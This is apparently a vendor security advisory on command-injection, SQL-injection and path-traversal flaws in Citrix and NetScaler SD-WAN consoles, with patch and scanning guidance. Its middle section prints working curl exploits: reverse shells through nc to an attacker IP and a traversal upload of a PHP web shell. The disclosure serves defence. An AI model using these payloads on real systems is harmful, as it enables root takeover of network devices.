Citrix SD-WAN Center and NetScaler SD-WAN Center Multiple Security Vulnerabilities

Recently, multiple vulnerabilities have been identified in the management console of the Citrix SD-WAN Center, NetScaler SD-WAN Center, Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance. The vulnerabilities exist because affected product fails to sanitize certain HTTP request parameter values, which are used to construct a shell command. This would allow an attacker to execute arbitrary commands on the affected system as a root.

Below CVE id’s has been assigned to track these vulnerabilities.

CVE-2019-12985 – Unauthenticated Command Injection
CVE-2019-12986 – Unauthenticated Command Injection
CVE-2019-12987 – Unauthenticated Command Injection
CVE-2019-12988 – Unauthenticated Command Injection
CVE-2019-12990 – Unauthenticated Directory Traversal File Write
CVE-2019-12992 – Authenticated Command Injection
CVE-2019-12989 – Unauthenticated SQL Injection
CVE-2019-12991 – Authenticated Command Injection

Affected systems:

Below Versions of Citrix SD-WAN Center and Citrix SD-WAN Appliance are affected:

All versions of NetScaler SD-WAN 9.x
All versions of NetScaler SD-WAN 10.0.x earlier than 10.0.8
All versions of Citrix SD-WAN 10.1.x
All versions of Citrix SD-WAN 10.2.x earlier than 10.2.3


Crafted Curl command that created a token file in tmp directory

An attacker can use below URL to bypass the authentication and gain access to vulnerable systems.

Logged in without any password

Similarly, an unauthenticated remote attacker could use below exploits to execute arbitrary commands on the targeted system

- curl -vk -X $'POST' --data-binary 'ipAddress=%60sudo+/bin/nc+-nv+'$nc_attacker_ip'+'$nc_attacker_port'+-e+/bin/bash%60' https://$target-IP/Collector/diagnostics/ping

- curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target-IP/Collector/diagnostics/trace_route

- curl --insecure 'https://'$target-IP'/Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype'

- curl --insecure 'https://'$target-IP'/Collector/nms/addModifyZTDProxy?ztd_server=$(sudo$IFS/bin/nc$IFS-nv$IFS$(/bin/echo$IFS-e$IFS\x3'$ncip')$IFS$(/bin/echo$IFS-e$IFS\x3'$ncport')$IFS-e$IFS/bin/bash)'

- curl --insecure -d 'filename=../../../../../../home/talariuser/www/app/webroot/files/shell.php&filedata=' https://$target-IP/Collector/appliancesettings/applianceSettingsFileTransfer 

curl --insecure https://$target-IP/talari/app/files/shell.php


Citrix has released updates to address these vulnerabilities. We request organizations to follow CTX251987 to protect against these vulnerabilities. Customers can scan their network with QID#13560 to identify vulnerable assets remotely. Additionally, customers can review their Citrix SD-WAN & NetScaler SD-WAN deployments to ensure that the management console is not exposed to untrusted network traffic.

References & Sources:

Leave a Reply

Your email address will not be published. Required fields are marked *